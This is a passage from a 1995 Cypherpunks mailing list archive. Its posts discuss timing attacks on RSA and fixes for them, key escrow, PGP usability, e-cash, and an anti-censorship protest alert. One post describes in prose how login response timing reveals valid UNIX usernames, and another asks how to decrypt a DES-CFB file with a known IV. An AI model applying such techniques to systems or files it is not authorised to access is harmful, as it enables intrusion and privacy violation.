QM? However, I don't think that you'll be able to provide "only one copy", because once that copy is received and read once the recipient can recreate it. Hope I'm making sense... Jiri - -- If you want an answer, please mail to . On sweeney, I may delete without reading! PGP 463A14D5 (but it's at home so it'll take a day or two) PGP EF0607F9 (but it's at uni so don't rely on it too much) -----BEGIN PGP SIGNATURE----- Version: 2.6.2i iQCVAwUBMM1tASxV6mvvBgf5AQETAgQAqd7VA7vTI2IyPNJ6MyJbV2Q6BKOQLww8 TB5g1ddVoYbktwQf0BW5YT5E9RKd1jfAvA43ZOd2Q2Po2vmDKid2J9xlwKoqhn1B Qrn30sKgxETMS+BfTa91dWyT0W9w6uudYubQqZU4MLthhUHT9kq6VuE1PCmTvHUl cAf2Ku+QhFE= =CySl -----END PGP SIGNATURE----- From ecarp at netcom.com Tue Dec 12 04:05:53 1995 From: ecarp at netcom.com (Ed Carp) Date: Tue, 12 Dec 95 04:05:53 PST Subject: Roger's case against RSA? Message-ID: <199512121203.EAA01268@netcom20.netcom.com> I know that a week or so ago, there was a hearing in San Jose regarding Roger Schafly's (sp.) case against RSA. How did the hearing come out? I never saw a post... :( -- Ed Carp, N7EKG Ed.Carp at linux.org, ecarp at netcom.com 214/993-3935 voicemail/digital pager 800/558-3408 SkyPager Finger ecarp at netcom.com for PGP 2.5 public key an88744 at anon.penet.fi "Past the wounds of childhood, past the fallen dreams and the broken families, through the hurt and the loss and the agony only the night ever hears, is a waiting soul. Patient, permanent, abundant, it opens its infinite heart and asks only one thing of you ... 'Remember who it is you really are.'" -- "Losing Your Mind", Karen Alexander and Rick Boyes From DMiskell at envirolink.org Mon Dec 11 12:41:18 1995 From: DMiskell at envirolink.org (Daniel Miskell) Date: Tue, 12 Dec 1995 04:41:18 +0800 Subject: The Elevator Problem Message-ID: <9512111557.AA09207@envirolink.org> Ok, here was the method of key generation i was talking about. With the light communications, the idea was to use photons whose waves pulsed in certain directions (up/down, left/right, and diagonally) to create a way toommunicate much like morse code. The key used to scramble these communications was designed to change the direction the photons of a message pulsated - like changing the characters of a message, scrambling it up. The key consisted of three symbols, one for each of the possible orientations, and was fainly simple. It was like a one time pad in that the key was never recycled. The key could be generated by a game of 20 questions, so to speak. The people at either end randomly generated a key. Then, they asked eiither indirect questions about the contents of one anothers key (do you have an odd number of up/down symbols in row x, etc), but since the contents of the key were never touched on DIRECTLY, no eavesdfropper could determine the key, and it was ttally secure. We, obviously, cannot use the photon as a method of communication, not for th e masses. the undertaking of building such a network from scratch is astronomical. however, if one wwas to use the orientation symbols in ones messages, as if they were being beamed, but in an email message instead, one could make use of the simple key, and the simple game of '20 questions' to generate a totally secure key in a mater of minutes, depending on how long the message was and therefore how long the key has to be. Does any of this make sense? Regards, Munster. --- _________________________________ *!Cheese Doctrine:!* Though cultured over time, and aged to perfection, one must not yield to produce mold. One must also not belittle themselves by conforming to the "whiz", but melt over the unprocessed ideas of Ghuda. _________________________________ From sinclai at ecf.toronto.edu Mon Dec 11 12:42:24 1995 From: sinclai at ecf.toronto.edu (SINCLAIR DOUGLAS N) Date: Tue, 12 Dec 1995 04:42:24 +0800 Subject: Timing attacks Message-ID: <95Dec11.111045edt.4478@cannon.ecf.toronto.edu> I have had some success using timing against UNIX to find out what usernames are valid on systems with finger &c disabled. If a username does not exist, it returns the "Login incorrect" a lot faster than it would if the username existed but the password was incorrect. I wonder how many other systems are vulnerable to this sort of attack. From eay at mincom.oz.au Mon Dec 11 13:04:23 1995 From: eay at mincom.oz.au (Eric Young) Date: Tue, 12 Dec 1995 05:04:23 +0800 Subject: Timing Cryptanalysis Attack In-Reply-To: <30CC02F5.4487@netscape.com> Message-ID: On Mon, 11 Dec 1995, Tom Weinstein wrote: > Careful. Even if you can make the number of executed instructions the > same, you still have to worry about timing differences due to branches > and the way the hardware multiplier handles different operands. Granted. For my particular library, there are no major 'if statements' I believe (I'll check) after you get out of the mod_exp function and into the mod and mul sub parts. As for the multiplier, I just had a look at my old 386 book and yup, it does take an argument dependent time... I've been around pipelined RISC cpus too long... eric -- Eric Young | Signature removed since it was generating AARNet: eay at mincom.oz.au | more followups than the message contents :-) From perry at piermont.com Tue Dec 12 05:06:37 1995 From: perry at piermont.com (Perry E. Metzger) Date: Tue, 12 Dec 95 05:06:37 PST Subject: Timing Cryptanalysis Attack In-Reply-To: <199512120058.BAA25991@utopia.hacktic.nl> Message-ID: <199512121306.IAA02006@jekyll.piermont.com> Anonymous writes: > "Perry E. Metzger" writes: > > > Timings like the ones listed are trivial to take in > > establishing things like SSL sessions, or Photuris sessions. > > The danger is to online protocols, not to PGP. > > This must be a new and interesting definition of the word > "trivial" with which I was previously unfamiliar. > > Quite frankly, I would be extremely surprised if anyone mounted a > successful hostile attack against a server's RSA certificate > using timings of remotely initiated SSL sessions outside of a > controlled laboratory environment. Go ahead and trust that no one can do it, then. Considering that NTP can synch up clocks over the net with astonishing accuracy with multiple probes, it would be hard to believe that you couldn't similarly dramatically reduce the effects of network delays for the purposes of mounting an attack on an RSA key, too. However, if you don't believe it is possible, why, go ahead and ignore it. Not my problem what you do. Perry From bdavis at thepoint.net Mon Dec 11 13:09:26 1995 From: bdavis at thepoint.net (Brian Davis) Date: Tue, 12 Dec 1995 05:09:26 +0800 Subject: [Mix-L] WARNING: sting via remailer! (fwd) In-Reply-To: Message-ID: On Wed, 6 Dec 1995, Mutatis Mutantdis wrote: > Bryan Strawser wrote: > > >Forwarded message: > [..] > >> I was in the federal building coffee shop in Reston, Va. yesterday > >> when I overheard a conversation between what appeared to be two FBI agents > >> discussing a sting operation involving Mixmaster. Hearing the word > >> "mixmaster" naturally caused my ears to perk up and I listened further. > >> > >> It appears that the FBI has coerced a mixmaster remailer operator > >> into cooperating with them in a sting operation to catch remailers when > >> they forward email pertaining to pornography, pedophilia, and copy-written > >> software. > > Not that such a thing is impossible, but it seems awfully suspicious > that FBI agents would be talking about a case within earshot of the > general public... I think you are giving the agents too much credit if you believe that they never discuss investigations while having coffee in the Federal Building -- or even while having lunch at McDonald's. While sitting in close proximity to other tables, I've had to shush agents who were speaking loudly about a case or investigation... EBD > > --Mutant Rob > > > Not a lawyer on the Net, although I play one in real life. ********************************************************** Flame away! I get treated worse in person every day!! From nsb at nsb.fv.com Mon Dec 11 13:10:34 1995 From: nsb at nsb.fv.com (Nathaniel Borenstein) Date: Tue, 12 Dec 1995 05:10:34 +0800 Subject: Timing Cryptanalysis Attack In-Reply-To: <199512110845.JAA25564@utopia.hacktic.nl> Message-ID: <0kn1kjCMc50e02ivZP@nsb.fv.com> Hey, don't go for constant time, that's too hard to get perfect. Add a *random* delay. This particular crypto-flaw is pretty easy to fix. (See, I'm not *always* arguing the downside of cryptography!) It is worth noting, however, the extent to which "secure" cryptographic protocols keep needing to get fixed one last time.... -- Nathaniel -------- Nathaniel Borenstein | (Tense Hot Alien In Barn) Chief Scientist, First Virtual Holdings | VIRTUAL YELLOW RIBBON: FAQ & PGP key: nsb+faq at nsb.fv.com | http://www.netresponse.com/zldf From hallam at w3.org Mon Dec 11 13:12:18 1995 From: hallam at w3.org (hallam at w3.org) Date: Tue, 12 Dec 1995 05:12:18 +0800 Subject: NSA rigs Crypto machines according to Balto Sun In-Reply-To: Message-ID: <9512111614.AA12454@zorch.w3.org> >So, is this what happened at Crypto AG? Is this what happened at >Netscape? We may never no for certain, but there is a final >warning for the folks at Netscape that is buried the Sun's >article about Crypto AG: No it is nothing like what happened at Netscape which was a common or garden cock up. It was simply the result of miscommunication between two groups of people being the original and new security team. Taher et al thought that the random number seed was OK because they discovered a design document describing it. Unfortunately the code had not been written to implement that design. Phill From nyuan at husc.harvard.edu Mon Dec 11 13:14:46 1995 From: nyuan at husc.harvard.edu (Nina Yuan) Date: Tue, 12 Dec 1995 05:14:46 +0800 Subject: [NOISE] REQ: "Markov" filter as recently posted in .shar form In-Reply-To: <199512110127.UAA22346@yakko.cs.wmich.edu> Message-ID: <199512111332.IAA04497@fas.harvard.edu> > Apologies, but I already tried all standard net searches on this. Someone > recently posted a .shar archive for a program called Markov, which filters [snip] > also looked on the archives at hks.net, but had no luck there. If some > kind person will post it again, I'll give it a home on my page of WWW > resources. I have the binary, and am impressed and amused enough to keep > it for regular use.. anyone for alt.usenet.kooks.markov? > > -- > http://yakko.cs.wmich.edu/~frogfarm ...for the best in unapproved information > EmmaGoldmanCamillePagliaMarieCurieAynRandSapphoDianaToriAmosPJHarvey&Demona > Hate, hate your enemies save, save your friends find, find your place > I feel a groove comin' on | speak..speak the truth | Freedom...yeah, right. It was posted by Rich Salz. In the interest of saving bandwidth, I'll mail it directly to the requestor, and other interested folks can grab it from the mentioned home page, FYI. -nhy --------------------------------------------------------------------------- Nina H. Yuan yuan at wjh.harvard.edu nyuan at fas.harvard.edu nyuan at bbn.com "Education is a progressive discovery of our own ignorance." - Will Durant --------------------------------------------------------------------------- From Kevin.L.Prigge-2 at cis.umn.edu Mon Dec 11 13:23:52 1995 From: Kevin.L.Prigge-2 at cis.umn.edu (Kevin L Prigge) Date: Tue, 12 Dec 1995 05:23:52 +0800 Subject: DES Cryptanalysis Message-ID: <30cc40ff3f57002@noc.cis.umn.edu> I'm looking for pointers, or perhaps an explanation of the statement I found in Applied Cryptography (section 9.6) where it implies that if the IV is not unique in CFB mode, the cryptanalyst can recover the plaintext. The reason that this interests me is that I have a file, encrypted with DES in CFB mode. I believe I know the first 8 bytes of plaintext and I also know the IV used. While it'd be nice to decrypt this file, I don't know that it'd be worth brute forcing the key, even if the spare cycles to do it were available. Any pointers to any pertinant information would be appreciated. Thanks. -- Kevin L. Prigge |"A computer lets you make more mistakes faster UofM Central Computing | than any invention in human history--with the email: klp at umn.edu | possible exceptions of handguns and tequila." 01001001110101100110001| - Mitch Ratcliffe From ecarp at netcom.com Tue Dec 12 05:30:10 1995 From: ecarp at netcom.com (Ed Carp (ecarp@netcom.com)) Date: Tue, 12 Dec 95 05:30:10 PST Subject: In pursuit of the perfect frisbie (was NSA flying disk...) Message-ID: <199512121139.FAA22570@khijol> > To: cman at communities.com (Douglas Barnes) > Cc: cypherpunks at toad.com, turner at TeleCheck.com > Subject: In pursuit of the perfect frisbie (was NSA flying disk...) > Date: Mon, 11 Dec 95 14:33:26 -0600 > From: turner at TeleCheck.com > I spoke with Mr. Cisco for several minutes, but he stated that the > NSA would not be at any trade shows in the Southern United States > any time soon. He did state that they would be in Salt Lake, sometime > in the near future. Did he mention a specific data and place? I still have friends in SLC... :) From perry at piermont.com Mon Dec 11 13:31:37 1995 From: perry at piermont.com (Perry E. Metzger) Date: Tue, 12 Dec 1995 05:31:37 +0800 Subject: Timing Cryptanalysis Attack In-Reply-To: <30CC02F5.4487@netscape.com> Message-ID: <199512111815.NAA02202@jekyll.piermont.com> Tom Weinstein writes: > > I for one will probably add a flag for conditional compilation of my > > bignumber library so that it will take constant time. This may be a > > %10 slow down (using small windows exponentiation) which is trivial > > compared to the %30 speedup I will probably get when I implement a > > faster mod function :-). > > Careful. Even if you can make the number of executed instructions the > same, you still have to worry about timing differences due to branches > and the way the hardware multiplier handles different operands. The trivial way to handle this is simply to check user time with the right system calls and make sure it always comes out the same with an apropriate number of sleeps. Perry From ecarp at netcom.com Tue Dec 12 05:32:38 1995 From: ecarp at netcom.com (Ed Carp (ecarp@netcom.com)) Date: Tue, 12 Dec 95 05:32:38 PST Subject: Third generation privacy Message-ID: <199512121201.GAA24738@khijol> > Date: Mon, 11 Dec 1995 15:50:23 -0500 > To: cypherpunks at toad.com > Subject: Third generation privacy > From: tallpaul at pipeline.com (tallpaul) > On Dec 11, 1995 13:07:22, '"Ed Carp (ecarp at netcom.com)" > ' wrote: > > >Another, not-so-obvious reason to encrypt stuff, especially stuff > >that goes out over the net, is that folks can suck your email off the > >net and gather all sorts of useful information. This has all kinds > >of annoying implications, especially for people who gather > >demographics and other data for constructing email lists for sale. > > > >-- short ed > > Another related issue is what I'll call "third generation" privacy. This > exists when I want privacy not for myself or even the person with whom I'm > communicating but to protect the privacy of innocent third parties. E.g.: > > Grandpa is getting senile and I'm communicating with a second family member > > on how we should handle the problem; > > My friend Jane was just raped and I'm communicating with a mutual friend > about how we can help her. > > The anti-freedom forces have tried to define the parameters of the debate > inside the boundaries of the "four horsemen." We need to understand that we > > do not have to remain within those false boundaries and, in fact, it is > very good not to. I run a sexual abuse survivor server, in which issues like these arise almost daily. Anonymity and privacy are very important issues for these folks - for some of them, their survival depends on it (whether or not this is a provable issue is irrelevent). I try, as best as I can, to provide an environment that encourages trust and openness by discouraging cheating - but the fact remains that people's trust in the server and the services it provides is a function of people's trust in *me*. It would be, as Doyle might say, "simplicity itself" to violate people's privacy by reading their email, or watching their screen as they type, and I'd like to *not* have that ability, but the fact remains, I do. I wish it weren't so - people should be able to have a place to go whereby their anonymity and privacy can be guaranteed, without having to trust the operator at all. Zero-knowedge protocols can help, I suspect, but the fact remains that they have to trust *me* at some point in the process, much as people have to trust the folks running First Virtual and the other people doing the digicash thing. I think that Pegasus with PGP will go a long way towards helping. If someone is just using the server to store encrypted email and route end-to-end encrypted packets, then I'm "out of the loop" so to speak, and can concentrate on providing a common carrier service iostead of having the risk associated with being a publisher. Most of these folks who use my server are pretty "computer illiterate" - the fact that some of them can even log in and send email is a miracle - no slight intended. The point is, they need a *simple* solution to that privacy problem. By the way, there's a well-known anonymous server whose operator does *not* have the same viewpoint, and considers himself a publisher, but doesn't recognize the inherent associated risks. To him, people are using his system, and so he has the right to "see what goes through his system." To me, this places both himself and the people who use his server at grave risk. He is setting himself up for a massive court fight, and they are setting themselves up to having their privacy being violated. I'd rather not take the risk, myself, but I suppose he has nothing better to spend his money on than lawyers. From nsb at nsb.fv.com Mon Dec 11 13:33:24 1995 From: nsb at nsb.fv.com (Nathaniel Borenstein) Date: Tue, 12 Dec 1995 05:33:24 +0800 Subject: Usability of Cryptography (was Re: More FUD from First Virtual) In-Reply-To: <199512102134.PAA19064@khijol> Message-ID: Excerpts from mail.nonpersonal: 10-Dec-95 Re: More FUD from First Vir.. "Ed Carp"@netcom.com (5360) > IMO, taking > the complexity out of the key management process will almost > certainly lead to designers and programmers making bad decisions > about how the process should work This is exactly right. In fact, it isn't even just bad programmer decisions; some of the complexity is really inherently needed for security. PGP's notion of who you trust to certify keys, for example, confuses the heck out of naive users, who want to "trust" anyone they believe is a good person, not just people they believe are sophisticated enough to sign keys. It's really hard to explain to some people why they should say, "No, I don't trust Grandma." What a lot of people don't seem to realize is that, in crypto software, there is a fundamental tradeoff between usability and security. You can simplify PGP (or similar software) to the point where it's easy to deal with key management, but it will then be far more susceptible to compromise. Key management is the Achilles heel of crypto-for-the-masses. I know there are some people who want to shoot the messenger, and who think that by stating this fact, I am declaring myself an opponent of cryptography, but the fact is that my company has been using PGP very heavily internally for almost 2 years, and we think we've managed our keys securely, but it has taken a lot of effort and user education. The experience has left us more skeptical than ever about secure key management by and for millions of non-technical customers. -------- Nathaniel Borenstein | (Tense Hot Alien In Barn) Chief Scientist, First Virtual Holdings | VIRTUAL YELLOW RIBBON: FAQ & PGP key: nsb+faq at nsb.fv.com | http://www.netresponse.com/zldf From dklur at dttus.com Mon Dec 11 13:33:54 1995 From: dklur at dttus.com (David Klur) Date: Tue, 12 Dec 1995 05:33:54 +0800 Subject: No Subject Message-ID: <9511118187.AA818709467@cc2.dttus.com> Is the Cafe e-cash system different than Mondex? If so, how? Also, does anyone know when the Mondex trial will start in Delaware? -----BEGIN PBP SIGNATURE----- Version: 1.0.0, Copyright 1995, Pretty Bad Privacy David Klur dklur at dttus.com I am who I am because I say so. So there. -----END PBP SIGNATURE------- From A&SUser at cctr.umkc.edu Mon Dec 11 13:35:04 1995 From: A&SUser at cctr.umkc.edu (A&SUser) Date: Tue, 12 Dec 1995 05:35:04 +0800 Subject: Pornographic stories Message-ID: <199512111618.IAA06435@cygnus.com> Hey, I'm Molly, and I know I sent you a bit of mail a couple of days ago. I'm not sure how you do your Pornographic server, so I'll just ask again. I know I would be VERY gratful if you could send me any XXX stories, I love to read them. I could reward you over the net somehow I'm sure. my adress is mphillips at cctr.umkc.edu Thanks....I'll be waiting. From nsb at nsb.fv.com Tue Dec 12 05:38:28 1995 From: nsb at nsb.fv.com (Nathaniel Borenstein) Date: Tue, 12 Dec 95 05:38:28 PST Subject: Usability of Cryptography (was Re: More FUD from First Virtual) In-Reply-To: <199512112006.NAA15060@taussky.cs.colorado.edu> Message-ID: Excerpts from mail.nonpersonal: 11-Dec-95 Re: Usability of Cryptograp.. Bryce at taussky.cs.colorad (6455) > I challenge you, however, to go beyond pointing this problem > out and start suggesting some approaches to alleviating it. Actually, this was something I was strongly considering doing as a major new venture *until* Einar Stefferud introduced me to Lee Stein and we realized that you could do payments without any cryptography at all. That, as you have seen, turned into a fairly major distraction. I'd still like to get back to usable crypto some day, however. There are about a gazillion *easy* ways to make crypto software more usable. PGP is a *great* starting point in this regard, as almost any user interface change is an improvement. :-) What's less obvious, and most critical, is how to map the complexities of key management onto a usable interface. What few ideas I have in this regard are, well, ones I'd really like to productize some day, which makes me a bit reluctant to suggest them publicly at this point..... I guess the one hint I'll drop is that the art of designing good user interfaces usually comes down to choosing the right abstractions or metaphors. -------- Nathaniel Borenstein (FAQ & PGP key: nsb+faq at nsb.fv.com) Chief Scientist, First Virtual Holdings VIRTUAL YELLOW RIBBON==> http://www.netresponse.com/zldf From support at marktwain.com Mon Dec 11 13:43:51 1995 From: support at marktwain.com (Mark Twain Ecash Support) Date: Tue, 12 Dec 1995 05:43:51 +0800 Subject: Questions for Mark Twain Banks Message-ID: <199512111455.IAA08213@admin.starnet.net> At 02:37 AM 12/11/95 -0600, Sean Donelan wrote: >The St. Louis Internet Users Group is doing a meeting on digital cash >on Monday, Dec. 11. Since Mark Twain Banks is located in St. Louis, >they've been invited to send a few speakers on the topic. It is probably going to be me... --Lucky Green --Mark Twain Bank Ecash Support Ecash. The secure Internet payment system that protects your privacy. From pcw at access.digex.net Mon Dec 11 13:45:55 1995 From: pcw at access.digex.net (Peter Wayner) Date: Tue, 12 Dec 1995 05:45:55 +0800 Subject: NSA rigs Crypto machines according to Balto Sun Message-ID: At 11:14 AM 12/11/95, hallam at w3.org wrote: >>So, is this what happened at Crypto AG? Is this what happened at >>Netscape? We may never no for certain, but there is a final >>warning for the folks at Netscape that is buried the Sun's >>article about Crypto AG: > >No it is nothing like what happened at Netscape which was a common or >garden cock up. It was simply the result of miscommunication between >two groups of people being the original and new security team. Taher >et al thought that the random number seed was OK because they discovered >a design document describing it. Unfortunately the code had not been >written to implement that design. > > Phill Thanks for the deeper insight. Sure it was probably a mistake. But someone made the decision to write code that didn't conform to that design document. That person was probably saying, "Random number generator. Cool. I can use the standard C library." or whatever. But that person could have been saying, "Hey, if I slip this in then I'll be able to snag the session keys with impunity." We'll never know for sure. -Peter From jsw at netscape.com Mon Dec 11 13:53:30 1995 From: jsw at netscape.com (Jeff Weinstein) Date: Tue, 12 Dec 1995 05:53:30 +0800 Subject: Timing Cryptanalysis Attack In-Reply-To: <199512110845.JAA25564@utopia.hacktic.nl> Message-ID: <30CC0D31.293C@netscape.com> Anonymous wrote: > So while this is a very nice piece of work, and certainly of > theoretical interest, I don't think it will modify the way in > which people are advised to utilize cryptographic software, or > cause companies like Netscape of RSADSI to shed any tears. While an exploit of this attack against our software has not been demonstrated, and there is some debate about whether it will even work, we are taking it very seriously. We've been working with Paul to develop a fix, which we will implement even if the attack is never proven effective against our software. --Jeff PS - I think Paul was a bit surprised when Jim Barksdale pulled out his wallet and handed him 10 crisp $100 bills. :-) -- Jeff Weinstein - Electronic Munitions Specialist Netscape Communication Corporation jsw at netscape.com - http://home.netscape.com/people/jsw Any opinions expressed above are mine. From a.brown at nexor.co.uk Mon Dec 11 13:54:54 1995 From: a.brown at nexor.co.uk (Andy Brown) Date: Tue, 12 Dec 1995 05:54:54 +0800 Subject: Win NT proprietary pw encryption (Was: Re: Windows .PWL cracker...) In-Reply-To: <199512090815.DAA08976@opine.cs.umass.edu> Message-ID: <30CC1859.7C84@nexor.co.uk> Futplex wrote: > someone quoted: > Microsoft Knowledge Base article Q102716 says: > > Storage of the Passwords in the SAM Database > [...] > > The second encryption is decryptable by anyone who has access to the > > double-encrypted password, the user's RID, and the algorithm. The second > > encryption is used for obfuscation purposes. > > Anyone feel like putting together some sample plaintext/ciphertext pairs ? This will be really difficult, and in practice rather pointless. NT does not allow any user, priviliged or not, to gain access to any form (encrypted or not) of the passwords. They are stored in a protected area of the system registry that only the OS itself can access. The best that you can do is to ask the OS whether a given username/password pair is valid or not, and it took until version 3.51 before MS let you do even that! Of course, rebooting the PC and inspecting the disk with another OS is not an answer since in any decent environment you will not be able to march up to the server with a floppy and hit the reset button! - Andy From frissell at panix.com Mon Dec 11 13:55:39 1995 From: frissell at panix.com (Duncan Frissell) Date: Tue, 12 Dec 1995 05:55:39 +0800 Subject: Netscape announces position against GAK Message-ID: <2.2b8.32.19951211114432.00897dec@panix.com> At 04:59 PM 12/9/95 -0600, Frank Stuart wrote: >To avoid just saying "me too", I'll throw out another idea on making the U.S. >version of Netscape available to U.S. users over the Internet. How about a >phone number to call to get an access id of some sort that can be used to >FTP the software. As a deep cover agent for Icelandic Intelligence, I wandered down to my local Babbages this weekend and bought (for cash) a copy of the US version of the Netscape Browser. The $6/hour clerk did not ask for my passport (or birth certificate plus government photo ID). For Netscape's (and Babbages') sake, I hope the Feds don't find out. DCF From cme at TIS.COM Mon Dec 11 13:59:37 1995 From: cme at TIS.COM (Carl Ellison) Date: Tue, 12 Dec 1995 05:59:37 +0800 Subject: NIST GAK export meeting, sv In-Reply-To: <199512110001.QAA02413@comsec.com> Message-ID: <9512111605.AA10870@tis.com> >CRYPTO: Does anyone recall the cite for a paper a few years that set out a >way to have escrow agents who would be "oblivious" to the identity of the >subject of the warrant? And how would such an escrow agent be sure that >they were not being duped by the feds? AFAIK, Clipper and most of the other systems had escrow agents oblivious to the identity of the subject of the warrant. I have seen *no* system which allows an escrow agent to know it's not being duped by the feds and I believe I know how to prove that that's not possible. If you see any such system, please let me know. BTW, there was Silvio Micali's design which allowed the escrow agents to verify that they were given the right private key shares without anyone learning the private key in the process. That's the only oblivious mechanism I recall in this business. - Carl +--------------------------------------------------------------------------+ |Carl M. Ellison cme at tis.com http://www.clark.net/pub/cme | |Trusted Information Systems, Inc. http://www.tis.com/ | |3060 Washington Road PGP 2.6.2: 61E2DE7FCB9D7984E9C8048BA63221A2| |Glenwood MD 21738 Tel:(301)854-6889 FAX:(301)854-5363 | +--------------------------------------------------------------------------+ From righter at aros.net Mon Dec 11 14:02:58 1995 From: righter at aros.net (Sarah Thompson) Date: Tue, 12 Dec 1995 06:02:58 +0800 Subject: ALERT:INTERNET DAY OF PROTEST TUESDAY DECEMBER 12, 1995 (fwd) Message-ID: <199512100901.CAA15767@terra.aros.net> >Date: Sun, 10 Dec 1995 01:44:01 -0700 >From: molly at aros.net >Subject: ALERT:INTERNET DAY OF PROTEST TUESDAY DECEMBER 12, 1995 (fwd) >To: andelain at aros.net, matti at community.net, CAPSTACK_T at MSdisk.WUstl.EDU, > will at btsslc.com > > >======================================================================== > CAMPAIGN TO STOP THE NET CENSORSHIP LEGISLATION IN CONGRESS > > On Tuesday December 12, 1995, Join With Hundreds of Thousands > Of Your Fellow Internet Users In > > A NATIONAL INTERNET DAY OF PROTEST > > PLEASE WIDELY REDISTRIBUTE THIS DOCUMENT WITH THIS BANNER INTACT > REDISTRIBUTE ONLY UNTIL December 20, 1995 >________________________________________________________________________ >CONTENTS > Internet Day of Protest: Tuesday December 12, 1995 > What You Must Do On Tuesday December 12, 1995 > List of Participating Organizations > Where Can I Learn More? > >________________________________________________________________________ >INTERNET DAY OF PROTEST: TUESDAY DECEMBER 12, 1995 > >Outrageous proposals to censor the Internet demand that the Internet >Community take swift and immediate action. We must stand up and let >Congress know that we will not tolerate their attempts to destroy this >medium! Please join hundreds of thousands of your fellow citizens in a >National Day of Protest on Tuesday December 12, 1995. > >As you know, on Wednesday December 6, 1995, the House Conference >Committee on Telecommunications Reform voted to impose far reaching and >unconstitutional "indecency" restrictions on the Internet and other >interactive media, including large commercial online services (such as >America Online, Compuserve, and Prodigy) and smaller Internet Service >Providers such as Panix, the Well, Echo, and Mindvox. > >These restrictions threaten the very existence of the Internet and >interactive media as a viable medium for free expression, education, >commerce. If enacted, the Internet as we know it will never be the >same. > >Libraries will not be able to put any books online that might >offend a child somewhere. No "Catcher in the Rye" or "Ulysses" on the net. >Internet Service Providers could face criminal penalties for allowing >children to subscribe to their Internet Services, forcing many small >companies to simply refuse to sell their services to anyone under 18. Worst >of all, everything you say and publish on the net will have to be "dumbed >down" to that which is acceptable to a child. > >As Internet users, we simply must not allow this assault against the >Internet and our most basic freedoms to go unchallenged. > >On Tuesday December 12, the organizations below are urging you to >join us in a NATIONAL DAY OF PROTEST. The goal is to flood key members of >the House and Senate with phone calls, faxes and email with the message >that the Internet community WILL NOT TOLERATE Congressional attempts to >destroy the Internet, limit our freedoms and trample on our rights. > >Below are the phone, fax, and email address of several key members of >Congress on this issue and instructions on what you can do to join the >National Day of Protest to save the Net. > >______________________________________________________________________ >WHAT YOU MUST DO ON TUESDAY DECEMBER 12, 1995 > >1. Throughout the day Tuesday December 12, please contact as many > members of Congress on the list below as you can. If you are only > able to make one call, contact House Speaker Newt Gingrich. Finally, > if the Senator or Representative from your state is on the list > below, be sure to contact him or her also. > >2. Urge each Member of Congress to "stop the madness". Tell them that > they are about to pass legislation that will destroy the Internet as > an educational and commercial medium. If you are at a loss for > words, try the following sample communique: > > Sample phone call: > > Both the House and Senate bills designed to protect children > from objectionable material on the Internet will actually > destroy the Internet as an medium for education, commerce, and > political discourse. There are other, less restrictive ways to > address this issue. > > I urge you to oppose both measures being proposed in the > conference committee. This is an important election issue to > me. > > Sample letter (fax or email): > > The Senate conferees are considering ways to protect children > from inappropriate material on the Internet. A vote for either > the House or Senate proposals will result in the destruction of > the Internet as a viable medium for free expression, education, > commerce. Libraries will not be able to put their entire book > collections online. Everyday people like me will risk massive > fines and prison sentences for public discussions someone s > somewhere might consider "indecent". > > There are other, less restrictive ways to protect children from > objectionable material online. This is an important election > issue to me. > >3. If you're in San Francisco, or near enough to get there, go to > the Rally Against Censorship from Ground Zero of the Digital Revolution: > > WHEN: Monday, December 11, 1995 12:00 - 1:00 PM > WHERE: South Park (between 2nd and 3rd, Bryant and Brannon) San Francisco. > SPEAKERS: To be announced > BRING: Attention-grabbing posters, signs, and banners that demonstrate > your committment to free speech and expression, and your feelings > about Congress. > FOR UPDATED INFORMATION (including rain info): > http://www.hotwired.com/staff/digaman/ > > >### THIS IS VERY IMPORTANT ### > >4. Mail a note to protest at vtw.org to let us know you did your part. > Although you will not receive a reply due to the number of > anticipated responses, we'll be counting up the number of people that > participated in the day of protest. > > > P ST Name and Address Phone Fax > = == ======================== ============== ============== > R AK Stevens, Ted 1-202-224-3004 1-202-224-1044 > R AZ McCain, John 1-202-224-2235 1-602-952-8702 > senator_mccain at mccain.senate.gov > D HI Inouye, Daniel K. 1-202-224-3934 1-202-224-6747 > R KS Dole, Robert 1-202-224-6521 1-202-228-1245 > D KY Ford, Wendell H. 1-202-224-4343 1-202-224-0046 > wendell_ford at ford.senate.gov > R MS Lott, Trent 1-202-224-6253 1-202-224-2262 > R MT Burns, Conrad R. 1-202-224-2644 1-202-224-8594 > conrad_burns at burns.senate.gov > D NE Exon, J. J. 1-202-224-4224 1-202-224-5213 > D SC Hollings, Ernest F. 1-202-224-6121 1-202-224-4293 > senator at hollings.senate.gov > R SD Pressler, Larry 1-202-224-5842 1-202-224-1259 > larry_pressler at pressler.senate.gov > R WA Gorton, Slade 1-202-224-3441 1-202-224-9393 > senator_gorton at gorton.senate.gov > D WV Rockefeller, John D. 1-202-224-6472 n.a. > senator at rockefeller.senate.gov > > Dist ST Name, Address, and Party Phone Fax > ==== == ======================== ============== ============== > 6 GA Gingrich, Newt (R) 1-202-225-4501 1-202-225-4656 > 2428 RHOB georgia6 at hr.house.gov > 14 MI Conyers Jr., John (D) 1-202-225-5126 1-202-225-0072 > 2426 RHOB jconyers at hr.house.gov > 1 CO Schroeder, Patricia (D) 1-202-225-4431 1-202-225-5842 > 2307 RHOB > 18 TX Jackson-Lee, Sheila (D) 1-202-225-3816 1-202-225-3317 > 1520 LHOB > 6 TN Gordon, Bart (D) 1-202-225-4231 1-202-225-6887 > 2201 RHOB > > >4. Forward this alert to all of your wired friends. > >________________________________________________________________________ >WHERE CAN I LEARN MORE? > >At this moment, there are several organizations with WWW sites that now >have, or will have, information about the net censorship legislation and >the National Day Of Protest: > >American Civil Liberties Union (ftp://ftp.aclu.org/aclu/) >Center for Democracy and Technology (http://www.cdt.org/) >Electronic Frontier Foundation (http://www.eff.org/) >Electronic Privacy Information Center (http://www.epic.org/) >Wired Magazine (http://www.hotwired.com/special/indecent/) >Voters Telecommunications Watch (http://www.vtw.org/) > >________________________________________________________________________ >LIST OF PARTICIPATING ORGANIZATIONS > >In order to use the net more effectively, several organizations have >joined forces on a single Congressional net campaign to stop the >Communications Decency Act. > > >American Civil Liberties Union * American Communication Association * >American Council for the Arts * Arts & Technology Society * Association >of Alternative Newsweeklies * biancaTroll productions * Boston >Coalition for Freedom of Expression * Californians Against Censorship >Together * Center For Democracy And Technology * Centre for Democratic >Communications * Center for Public Representation * Citizen's Voice - >New Zealand * Cloud 9 Internet *Computer Communicators Association * >Computel Network Services * Computer Professionals for Social >Responsibility * Cross Connection * Cyber-Rights Campaign * CyberQueer >Lounge * Dorsai Embassy * Dutch Digital Citizens' Movement * ECHO >Communications Group, Inc. * Electronic Frontier Canada * Electronic >Frontier Foundation * Electronic Frontier Foundation - Austin * >Electronic Frontiers Australia * Electronic Frontiers 